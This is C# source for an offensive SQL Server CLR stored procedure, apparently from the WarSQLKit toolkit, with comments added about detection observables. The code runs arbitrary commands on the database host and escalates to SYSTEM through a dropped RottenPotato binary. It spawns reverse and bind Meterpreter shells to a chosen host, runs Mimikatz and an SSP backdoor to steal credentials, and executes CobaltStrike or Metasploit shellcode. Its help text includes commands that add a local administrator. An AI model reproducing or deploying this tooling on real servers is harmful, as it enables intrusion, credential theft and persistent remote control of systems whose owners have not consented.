/// <summary>
/// Dispatcher behind the <c>sp_cmdExec</c> CLR stored procedure (no-result overload).
/// Interprets the caller-supplied <paramref name="cmd"/> by substring matching and runs
/// the selected action on the database host, streaming status text back to the SQL
/// client through <see cref="SqlContext.Pipe"/>.
/// </summary>
/// <param name="cmd">
/// Raw command text from T-SQL. The branches below are independent <c>if</c> statements
/// keyed on <c>Contains</c> / <c>==</c>, so they are not mutually exclusive and one input
/// can satisfy more than one of them.
/// </param>
/// <remarks>
/// Host-side observables useful for detection and forensics: every executing branch goes
/// through <c>cmd.exe /c</c> spawned from the SQL Server host process; several branches
/// write helper binaries under <c>C:\ProgramData\</c> (<c>Kumpir.exe</c>, <c>MimiPs.exe</c>)
/// and remove them again in a <c>finally</c> block, so the on-disk artifact is short-lived
/// while process-creation telemetry is not. The meterpreter branches have no such cleanup,
/// so <c>Kumpir.exe</c> may remain on disk after them. Every <c>SqlContext.Pipe.Send</c>
/// string is returned to the client and is therefore visible in any server-side capture of
/// the session. <c>RunCommand</c>, <c>RunSystemPS</c>, <c>RunSystemPriv</c>,
/// <c>CreateKumpir</c>, <c>MeterpreterBuilder</c>, <c>FileDownloader</c>, <c>GetMimiLog</c>,
/// <c>GetSqlHash</c>, <c>GetProduct</c> and <c>GetDatabases</c> are defined elsewhere in
/// the project; their internals are not visible here.
/// </remarks>
public static void CmdExec(string cmd)
{
    SqlContext.Pipe.Send("Command is running, please wait.");
    // Plain mode: input mentions neither an "sp_" keyword nor a /RunSystem* switch, so it is
    // handed to cmd.exe unchanged and whatever RunCommand returns is sent to the pipe.
    if (!cmd.Contains("sp_") && !cmd.Contains("/RunSystemPriv") && !cmd.Contains("/RunSystemPS"))
    {
        SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
    }
    // /RunSystemPS: the remainder of the input is wrapped in quotes and passed to Kumpir.exe
    // (named as the project's RottenPotato helper in the sp_help text) through RunSystemPS.
    if (cmd.Contains("/RunSystemPS"))
    {
        try
        {
            // Drops C:\ProgramData\Kumpir.exe only when absent. KumpirBytes() presumably
            // writes that file — confirm in CreateKumpir.
            if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
            {
                SqlContext.Pipe.Send("Creating Kumpir File");
                var createKumpir = new CreateKumpir();
                createKumpir.KumpirBytes();
            }
            // Strip the switch, then drop the final character (in the documented usage this
            // is the space that preceded the switch).
            var newCmd = cmd.Replace("/RunSystemPS", "");
            var newCmdReplace = newCmd.Remove(newCmd.Length - 1);
            SqlContext.Pipe.Send("Running PowerShell command with \"NT AUTHORITY\\SYSTEM\" rights");
            RunSystemPS("cmd.exe", " /c C:\\ProgramData\\Kumpir.exe " + "\"" + newCmdReplace + "\"");
        }
        catch (Exception e)
        {
            // Console output is unlikely to reach the SQL client; the exception is rethrown
            // and surfaces to the caller as a procedure error.
            Console.WriteLine(e);
            throw;
        }
        finally
        {
            // Removes the dropped helper whether or not the command succeeded.
            File.Delete("C:\\ProgramData\\Kumpir.exe");
        }
    }
    // /RunSystemPriv: same shape as above, but the remainder is passed unquoted to
    // RunSystemPriv and errors are reported on the pipe instead of rethrown.
    if (cmd.Contains("/RunSystemPriv"))
    {
        try
        {
            if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
            {
                SqlContext.Pipe.Send("Creating Kumpir File");
                var createKumpir = new CreateKumpir();
                createKumpir.KumpirBytes();
                // Mis-encoded Turkish status text ("file created"); a runtime string, kept as-is.
                SqlContext.Pipe.Send("Dosya Oluþturuldu");
            }
            var newCmd = cmd.Replace("/RunSystemPriv", "");
            var newCmdReplace = newCmd.Remove(newCmd.Length - 1);
            SqlContext.Pipe.Send("Running command with \"NT AUTHORITY\\SYSTEM\" rights");
            RunSystemPriv("cmd.exe", " /c C:\\ProgramData\\Kumpir.exe " + newCmdReplace);
        }
        catch (Exception e)
        {
            // "Task hataya" is Turkish ("task error"); the exception message is echoed to the client.
            SqlContext.Pipe.Send("Task hataya " + e.Message);
        }
        finally
        {
            File.Delete("C:\\ProgramData\\Kumpir.exe");
        }
    }
    // sp_Mimikatz (exact match): drops Kumpir.exe if absent, has MeterpreterBuilder write a
    // second binary (presumably the MimiPs.exe path used below — confirm in SaveMimikatz),
    // runs it through Kumpir.exe, then calls GetMimiLog. Both files are deleted afterwards;
    // the help text says the captured output lands in the WarSQLKitTemp table.
    if (cmd == "sp_Mimikatz")
    {
        if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
        {
            SqlContext.Pipe.Send("Creating Kumpir File");
            var createKumpir = new CreateKumpir();
            createKumpir.KumpirBytes();
        }
        try
        {
            var mimiBuilder = new MeterpreterBuilder();
            mimiBuilder.SaveMimikatz();
            var getMimikatzLocation = @"C:\ProgramData\MimiPs.exe";
            SqlContext.Pipe.Send("Running PowerShell command with \"NT AUTHORITY\\SYSTEM\" rights");
            RunCommand("cmd.exe", " /c C:\\ProgramData\\Kumpir.exe \"" + getMimikatzLocation + "\"");
            GetMimiLog();
        }
        catch (Exception e)
        {
            Console.WriteLine(e);
            throw;
        }
        finally
        {
            File.Delete("C:\\ProgramData\\Kumpir.exe");
            File.Delete("C:\\ProgramData\\MimiPs.exe");
        }
    }
    // Meterpreter branches: positional arguments are taken from a space split
    // (cmdSplit[1] = LHOST, cmdSplit[2] = LPORT per sp_help). When "GetSystem" appears
    // anywhere in the input, Kumpir.exe is dropped first and IsRunSystemPriv is set.
    // No cleanup of Kumpir.exe happens in these branches. Failures are reported on the pipe.
    if (cmd.Contains("sp_meterpreter_reverse_tcp"))
    {
        if (cmd.Contains("GetSystem"))
        {
            try
            {
                string[] cmdSplit = cmd.Split(' ');
                var createKumpir = new CreateKumpir();
                createKumpir.KumpirBytes();
                var buildMeterpreter = new MeterpreterBuilder { Ip = cmdSplit[1], Port = cmdSplit[2], IsRunSystemPriv = true };
                buildMeterpreter.SaveReverseMeterpreter();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
        else
        {
            try
            {
                string[] cmdSplit = cmd.Split(' ');
                var buildMeterpreter = new MeterpreterBuilder { Ip = cmdSplit[1], Port = cmdSplit[2] };
                buildMeterpreter.SaveReverseMeterpreter();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
    }
    // Same shape as the reverse_tcp branch, x64 variant.
    if (cmd.Contains("sp_x64_meterpreter_reverse_tcp"))
    {
        if (cmd.Contains("GetSystem"))
        {
            try
            {
                string[] cmdSplit = cmd.Split(' ');
                var createKumpir = new CreateKumpir();
                createKumpir.KumpirBytes();
                var buildMeterpreter = new MeterpreterBuilder { Ip = cmdSplit[1], Port = cmdSplit[2], IsRunSystemPriv = true };
                buildMeterpreter.Savex64ReverseMeterpreter();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
        else
        {
            try
            {
                string[] cmdSplit = cmd.Split(' ');
                var buildMeterpreter = new MeterpreterBuilder { Ip = cmdSplit[1], Port = cmdSplit[2] };
                buildMeterpreter.Savex64ReverseMeterpreter();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
    }
    // Same shape as the reverse_tcp branch, RC4 transport variant.
    if (cmd.Contains("sp_meterpreter_reverse_rc4"))
    {
        if (cmd.Contains("GetSystem"))
        {
            try
            {
                string[] cmdSplit = cmd.Split(' ');
                var createKumpir = new CreateKumpir();
                createKumpir.KumpirBytes();
                var buildMeterpreter = new MeterpreterBuilder { Ip = cmdSplit[1], Port = cmdSplit[2], IsRunSystemPriv = true };
                buildMeterpreter.SaveMeterpreterRc4();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
        else
        {
            try
            {
                string[] cmdSplit = cmd.Split(' ');
                var buildMeterpreter = new MeterpreterBuilder { Ip = cmdSplit[1], Port = cmdSplit[2] };
                buildMeterpreter.SaveMeterpreterRc4();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
    }
    // Bind variant: only a port argument (cmdSplit[1]); unlike the other meterpreter branches,
    // Kumpir.exe is dropped unconditionally here, with or without "GetSystem".
    if (cmd.Contains("sp_meterpreter_bind_tcp"))
    {
        try
        {
            string[] cmdSplit = cmd.Split(' ');
            var createKumpir = new CreateKumpir();
            createKumpir.KumpirBytes();
            if (cmd.Contains("GetSystem"))
            {
                var buildMeterpreter = new MeterpreterBuilder { Port = cmdSplit[1], IsRunSystemPriv = true };
                buildMeterpreter.SaveBindMeterpreter();
            }
            else
            {
                var buildMeterpreter = new MeterpreterBuilder { Port = cmdSplit[1] };
                buildMeterpreter.SaveBindMeterpreter();
            }
        }
        catch (Exception e)
        {
            SqlContext.Pipe.Send(e.Message);
        }
    }
    // Information-gathering helpers; in this overload their return values are discarded.
    if (cmd == "sp_getSqlHash")
    {
        GetSqlHash();
    }
    if (cmd == "sp_getProduct")
    {
        GetProduct();
    }
    if (cmd == "sp_getDatabases")
    {
        GetDatabases();
    }
    // sp_downloadFile <url> <destination path> <int>: fetches to the host via FileDownloader
    // (the third argument is parsed as an int; the help example uses 300 — its meaning is
    // defined in FileDownloader), then lists the destination with "dir". The listing is not
    // sent to the pipe in this overload.
    if (cmd.Contains("sp_downloadFile"))
    {
        var spliter = cmd.Split(' ');
        var downloadFile = new FileDownloader(spliter[1], spliter[2]);
        downloadFile.StartDownload(Int32.Parse(spliter[3]));
        RunCommand("cmd.exe", " /c dir " + spliter[2]);
    }
    // sp_help: usage text echoed one line per Send call. These strings are the procedure's
    // documented vocabulary and are a convenient signature for the toolkit in session captures.
    if (cmd == "sp_help")
    {
        SqlContext.Pipe.Send("WarSQLKit Command Example");
        SqlContext.Pipe.Send("EXEC sp_cmdExec 'whoami'; => Any Windows command");
        SqlContext.Pipe.Send("EXEC sp_cmdExec 'whoami /RunSystemPriv'; => Any Windows command with NT AUTHORITY\\SYSTEM rights");
        SqlContext.Pipe.Send("EXEC sp_cmdExec '\"net user eyup P@ssw0rd1 /add\" /RunSystemPriv'; => Adding users with RottenPotato (Kumpir)");
        SqlContext.Pipe.Send("EXEC sp_cmdExec '\"net localgroup administrators eyup /add\" /RunSystemPriv'; => Adding user to localgroup with RottenPotato (Kumpir)");
        SqlContext.Pipe.Send("EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS'; => (Powershell) with RottenPotato (Kumpir)");
        SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem'; => x86 Meterpreter Reverse Connection with NT AUTHORITY\\SYSTEM");
        SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem'; => x64 Meterpreter Reverse Connection with NT AUTHORITY\\SYSTEM");
        SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem'; => x86 Meterpreter Reverse Connection RC4 with NT AUTHORITY\\SYSTEM, RC4PASSWORD=warsql");
        SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem'; => x86 Meterpreter Bind Connection with NT AUTHORITY\\SYSTEM");
        SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_Mimikatz'; " + Environment.NewLine + "select * from WarSQLKitTemp => Get Mimikatz Log. Thnks Benjamin Delpy :)");
        SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_downloadFile http://eyupcelik.com.tr/file.exe C:\\ProgramData\\file.exe 300'; => Download File");
        SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_getSqlHash'; => Get MSSQL Hash");
        SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_getProduct'; => Get Windows Product");
        SqlContext.Pipe.Send("EXEC sp_cmdExec 'sp_getDatabases'; => Get Available Database");
    }
}
/// <summary>
/// Dispatcher behind the <c>sp_cmdExec</c> CLR stored procedure, overload that also returns
/// the command output through <paramref name="result"/>. Same substring-based dispatch as
/// the single-argument overload, plus the <c>sp_MimikatzSSP</c> and <c>sp_ShellCode</c>
/// branches that only exist here.
/// </summary>
/// <param name="cmd">
/// Raw command text from T-SQL. Branches are independent <c>if</c> statements keyed on
/// <c>Contains</c> / <c>==</c>, so more than one can run for a single input.
/// </param>
/// <param name="result">
/// Output of the last branch that assigned it; <c>""</c> when no branch matched. Initialised
/// before any branch so the <c>out</c> parameter is always set.
/// </param>
/// <remarks>
/// Host-side observables for detection and forensics: command execution is via
/// <c>cmd.exe /c</c> from the SQL Server host process; helper binaries are written under
/// <c>C:\ProgramData\</c> (<c>Kumpir.exe</c>, <c>MimiPs.exe</c>, <c>MimiSSP.exe</c>,
/// <c>loader.exe</c>). The <c>/RunSystem*</c> and Mimikatz branches delete their files in
/// <c>finally</c>; the meterpreter and <c>sp_ShellCode</c> branches do not, so those files
/// may persist. All <c>SqlContext.Pipe.Send</c> text is returned to the client. The helper
/// types and methods used here (<c>RunCommand</c>, <c>RunSystemPS</c>, <c>RunSystemPriv</c>,
/// <c>CreateKumpir</c>, <c>MeterpreterBuilder</c>, <c>FileDownloader</c>, <c>GetMimiLog</c>,
/// <c>GetSqlHash</c>, <c>GetProduct</c>, <c>GetDatabases</c>) live elsewhere in the project.
/// </remarks>
public static void CmdExec(String cmd, out SqlString result)
{
    SqlContext.Pipe.Send("Command is running, please wait.");
    // Declared but never used in this method.
    SqlParameter param = new SqlParameter("@result", SqlDbType.NText, -1);
    result = "";
    // Plain mode: no "sp_" keyword and no /RunSystem* switch. The full output is returned in
    // result; it is additionally echoed to the pipe only when shorter than 4000 characters.
    if (!cmd.Contains("sp_") && !cmd.Contains("/RunSystemPriv") && !cmd.Contains("/RunSystemPS"))
    {
        result = RunCommand("cmd.exe", " /c " + cmd);
        if (result.ToString().Length < 4000)
        {
            SqlContext.Pipe.Send(result.ToString());
        }
    }
    // /RunSystemPS: remainder of the input, quoted, passed to Kumpir.exe (named as the
    // project's RottenPotato helper in the help text) through RunSystemPS.
    if (cmd.Contains("/RunSystemPS"))
    {
        try
        {
            // Drops C:\ProgramData\Kumpir.exe only when absent. KumpirBytes() presumably
            // writes that file — confirm in CreateKumpir.
            if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
            {
                SqlContext.Pipe.Send("Creating Kumpir File");
                var createKumpir = new CreateKumpir();
                createKumpir.KumpirBytes();
            }
            // Strip the switch, then drop the final character (in the documented usage this
            // is the space that preceded the switch).
            var newCmd = cmd.Replace("/RunSystemPS", "");
            var newCmdReplace = newCmd.Remove(newCmd.Length - 1);
            SqlContext.Pipe.Send("Running PowerShell command with \"NT AUTHORITY\\SYSTEM\" rights");
            result = RunSystemPS("cmd.exe", " /c C:\\ProgramData\\Kumpir.exe " + "\"" + newCmdReplace + "\"");
        }
        catch (Exception e)
        {
            // Console output is unlikely to reach the SQL client; the exception is rethrown.
            Console.WriteLine(e);
            throw;
        }
        finally
        {
            // Removes the dropped helper whether or not the command succeeded.
            File.Delete("C:\\ProgramData\\Kumpir.exe");
        }
    }
    // /RunSystemPriv: same shape, remainder passed unquoted to RunSystemPriv; errors are
    // reported on the pipe rather than rethrown.
    if (cmd.Contains("/RunSystemPriv"))
    {
        try
        {
            if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
            {
                SqlContext.Pipe.Send("Creating Kumpir File");
                var createKumpir = new CreateKumpir();
                createKumpir.KumpirBytes();
            }
            var newCmd = cmd.Replace("/RunSystemPriv", "");
            var newCmdReplace = newCmd.Remove(newCmd.Length - 1);
            SqlContext.Pipe.Send("Running command with \"NT AUTHORITY\\SYSTEM\" rights");
            result = RunSystemPriv("cmd.exe", " /c C:\\ProgramData\\Kumpir.exe " + newCmdReplace);
        }
        catch (Exception e)
        {
            // "Task hataya" is Turkish ("task error"); the exception message is echoed to the client.
            SqlContext.Pipe.Send("Task hataya " + e.Message);
        }
        finally
        {
            File.Delete("C:\\ProgramData\\Kumpir.exe");
        }
    }
    // sp_Mimikatz (exact match): drops Kumpir.exe if absent, has MeterpreterBuilder write a
    // second binary (presumably the MimiPs.exe path used below — confirm in SaveMimikatz),
    // runs it through Kumpir.exe, then overwrites result with GetMimiLog(). Both files are
    // deleted afterwards; the help text says output also lands in the WarSQLKitTemp table.
    if (cmd == "sp_Mimikatz")
    {
        if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
        {
            SqlContext.Pipe.Send("Creating Kumpir File");
            var createKumpir = new CreateKumpir();
            createKumpir.KumpirBytes();
        }
        try
        {
            var mimiBuilder = new MeterpreterBuilder();
            mimiBuilder.SaveMimikatz();
            var getMimikatzLocation = @"C:\ProgramData\MimiPs.exe";
            SqlContext.Pipe.Send("Running PowerShell command with \"NT AUTHORITY\\SYSTEM\" rights");
            result = RunCommand("cmd.exe", " /c C:\\ProgramData\\Kumpir.exe \"" + getMimikatzLocation + "\"");
            result = GetMimiLog();
        }
        catch (Exception e)
        {
            Console.WriteLine(e);
            throw;
        }
        finally
        {
            File.Delete("C:\\ProgramData\\Kumpir.exe");
            File.Delete("C:\\ProgramData\\MimiPs.exe");
        }
    }
    // sp_MimikatzSSP: same flow as sp_Mimikatz with SaveMimikatzSsp and MimiSSP.exe
    // (described as "Ssp Backdoor" in the help text).
    if (cmd == "sp_MimikatzSSP")
    {
        if (!File.Exists("C:\\ProgramData\\Kumpir.exe"))
        {
            SqlContext.Pipe.Send("Creating Kumpir File");
            var createKumpir = new CreateKumpir();
            createKumpir.KumpirBytes();
        }
        try
        {
            var mimiBuilder = new MeterpreterBuilder();
            mimiBuilder.SaveMimikatzSsp();
            var getMimikatzLocation = @"C:\ProgramData\MimiSSP.exe";
            SqlContext.Pipe.Send("Running PowerShell command with \"NT AUTHORITY\\SYSTEM\" rights");
            result = RunCommand("cmd.exe", " /c C:\\ProgramData\\Kumpir.exe \"" + getMimikatzLocation + "\"");
            result = GetMimiLog();
        }
        catch (Exception e)
        {
            Console.WriteLine(e);
            throw;
        }
        finally
        {
            File.Delete("C:\\ProgramData\\Kumpir.exe");
            File.Delete("C:\\ProgramData\\MimiSSP.exe");
        }
    }
    // sp_ShellCode <arg1> <arg2> [GetSystem]: drops C:\ProgramData\loader.exe via LoaderBytes()
    // when absent and invokes it with the two positional arguments; with "GetSystem" it also
    // drops Kumpir.exe and runs the loader through it. Note the existence check names
    // loader.exe while the invocation path omits the extension. Neither file is deleted in
    // this branch, and result is not assigned.
    if (cmd.Contains("sp_ShellCode"))
    {
        string[] cmdSplit = cmd.Split(' ');
        string ScByte = cmdSplit[1];
        string Key = cmdSplit[2];
        if (!File.Exists("C:\\ProgramData\\loader.exe"))
        {
            SqlContext.Pipe.Send("Creating loader File");
            var createKumpir = new CreateKumpir();
            createKumpir.LoaderBytes();
        }
        if (cmd.Contains("GetSystem"))
        {
            try
            {
                var createKumpir = new CreateKumpir();
                createKumpir.KumpirBytes();
                RunCommand(@"C:\Windows\System32\cmd.exe", @" /c C:\\ProgramData\\Kumpir.exe ""C:\ProgramData\loader " + ScByte + @" " + Key + @" """);
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
        else
        {
            try
            {
                RunCommand(@"C:\Windows\System32\cmd.exe", @" /c C:\ProgramData\loader " + ScByte + @" " + Key + @" """);
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
    }
    // Meterpreter branches: positional arguments from a space split (cmdSplit[1] = LHOST,
    // cmdSplit[2] = LPORT per sp_help). "GetSystem" anywhere in the input drops Kumpir.exe
    // first and sets IsRunSystemPriv. No cleanup of Kumpir.exe happens here, and result is
    // not assigned; failures are reported on the pipe.
    if (cmd.Contains("sp_meterpreter_reverse_tcp"))
    {
        if (cmd.Contains("GetSystem"))
        {
            try
            {
                string[] cmdSplit = cmd.Split(' ');
                var createKumpir = new CreateKumpir();
                createKumpir.KumpirBytes();
                var buildMeterpreter = new MeterpreterBuilder { Ip = cmdSplit[1], Port = cmdSplit[2], IsRunSystemPriv = true };
                buildMeterpreter.SaveReverseMeterpreter();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
        else
        {
            try
            {
                string[] cmdSplit = cmd.Split(' ');
                var buildMeterpreter = new MeterpreterBuilder { Ip = cmdSplit[1], Port = cmdSplit[2] };
                buildMeterpreter.SaveReverseMeterpreter();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
    }
    // Same shape as the reverse_tcp branch, x64 variant.
    if (cmd.Contains("sp_x64_meterpreter_reverse_tcp"))
    {
        if (cmd.Contains("GetSystem"))
        {
            try
            {
                string[] cmdSplit = cmd.Split(' ');
                var createKumpir = new CreateKumpir();
                createKumpir.KumpirBytes();
                var buildMeterpreter = new MeterpreterBuilder { Ip = cmdSplit[1], Port = cmdSplit[2], IsRunSystemPriv = true };
                buildMeterpreter.Savex64ReverseMeterpreter();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
        else
        {
            try
            {
                string[] cmdSplit = cmd.Split(' ');
                var buildMeterpreter = new MeterpreterBuilder { Ip = cmdSplit[1], Port = cmdSplit[2] };
                buildMeterpreter.Savex64ReverseMeterpreter();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
    }
    // Same shape as the reverse_tcp branch, RC4 transport variant.
    if (cmd.Contains("sp_meterpreter_reverse_rc4"))
    {
        if (cmd.Contains("GetSystem"))
        {
            try
            {
                string[] cmdSplit = cmd.Split(' ');
                var createKumpir = new CreateKumpir();
                createKumpir.KumpirBytes();
                var buildMeterpreter = new MeterpreterBuilder { Ip = cmdSplit[1], Port = cmdSplit[2], IsRunSystemPriv = true };
                buildMeterpreter.SaveMeterpreterRc4();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
        else
        {
            try
            {
                string[] cmdSplit = cmd.Split(' ');
                var buildMeterpreter = new MeterpreterBuilder { Ip = cmdSplit[1], Port = cmdSplit[2] };
                buildMeterpreter.SaveMeterpreterRc4();
            }
            catch (Exception e)
            {
                SqlContext.Pipe.Send(e.Message);
            }
        }
    }
    // Bind variant: only a port argument (cmdSplit[1]); Kumpir.exe is dropped unconditionally
    // here, with or without "GetSystem".
    if (cmd.Contains("sp_meterpreter_bind_tcp"))
    {
        try
        {
            string[] cmdSplit = cmd.Split(' ');
            var createKumpir = new CreateKumpir();
            createKumpir.KumpirBytes();
            if (cmd.Contains("GetSystem"))
            {
                var buildMeterpreter = new MeterpreterBuilder { Port = cmdSplit[1], IsRunSystemPriv = true };
                buildMeterpreter.SaveBindMeterpreter();
            }
            else
            {
                var buildMeterpreter = new MeterpreterBuilder { Port = cmdSplit[1] };
                buildMeterpreter.SaveBindMeterpreter();
            }
        }
        catch (Exception e)
        {
            SqlContext.Pipe.Send(e.Message);
        }
    }
    // Information-gathering helpers; their return values become the procedure result.
    if (cmd == "sp_getSqlHash")
    {
        result = GetSqlHash();
    }
    if (cmd == "sp_getProduct")
    {
        result = GetProduct();
    }
    if (cmd == "sp_getDatabases")
    {
        result = GetDatabases();
    }
    // sp_downloadFile <url> <destination path> <int>: fetches to the host via FileDownloader
    // (the third argument is parsed as an int; the help example uses 300 — its meaning is
    // defined in FileDownloader), then returns a "dir" listing of the destination.
    if (cmd.Contains("sp_downloadFile"))
    {
        var spliter = cmd.Split(' ');
        var downloadFile = new FileDownloader(spliter[1], spliter[2]);
        downloadFile.StartDownload(Int32.Parse(spliter[3]));
        result = RunCommand("cmd.exe", " /c dir " + spliter[2]);
    }
    // sp_help: usage text returned as one newline-separated string. It lists sp_frpsocks5,
    // for which no branch exists above. These strings are the procedure's documented
    // vocabulary and a convenient signature for the toolkit in session captures.
    if (cmd == "sp_help")
    {
        result = "WarSQLKit Command Example\n"
            + "whoami => Any Windows command\n"
            + "whoami /RunSystemPriv => Any Windows command with NT AUTHORITY\\SYSTEM rights\n"
            + "\"net user eyup P@ssw0rd1 /add\" /RunSystemPriv => Adding users with RottenPotato (Kumpir)\n"
            + "\"net localgroup administrators eyup /add\" /RunSystemPriv => Adding user to localgroup with RottenPotato (Kumpir)\n"
            + "powershell Get-ChildItem /RunSystemPS => (Powershell) with RottenPotato (Kumpir)\n"
            + "sp_meterpreter_reverse_tcp LHOST LPORT GetSystem => x86 Meterpreter Reverse Connection with NT AUTHORITY\\SYSTEM\n"
            + "sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem => x64 Meterpreter Reverse Connection with NT AUTHORITY\\SYSTEM\n"
            + "sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem => x86 Meterpreter Reverse Connection RC4 with NT AUTHORITY\\SYSTEM, RC4PASSWORD=warsql\n"
            + "sp_meterpreter_bind_tcp LPORT GetSystem => x86 Meterpreter Bind Connection with NT AUTHORITY\\SYSTEM\n"
            + "sp_Mimikatz" + Environment.NewLine + "select * from WarSQLKitTemp => Get Mimikatz Log. Thnks Benjamin Delpy :)\n"
            + "sp_MimikatzSSP => Ssp Backdoor\n"
            + "sp_downloadFile http://eyupcelik.com.tr/file.exe C:\\ProgramData\\file.exe 300 => Download File\n"
            + "sp_getSqlHash => Get MSSQL Hash\n"
            + "sp_getProduct => Get Windows Product\n"
            + "sp_getDatabases => Get Available Database\n"
            + "sp_frpsocks5 => Todo: Use Frpc to open socks5\n"
            + "sp_ShellCode encrypt_code key GetSystem => Run Shellcode with Encrypt CobaltStrike or Metasploit with SYSTEM\n";
    }
}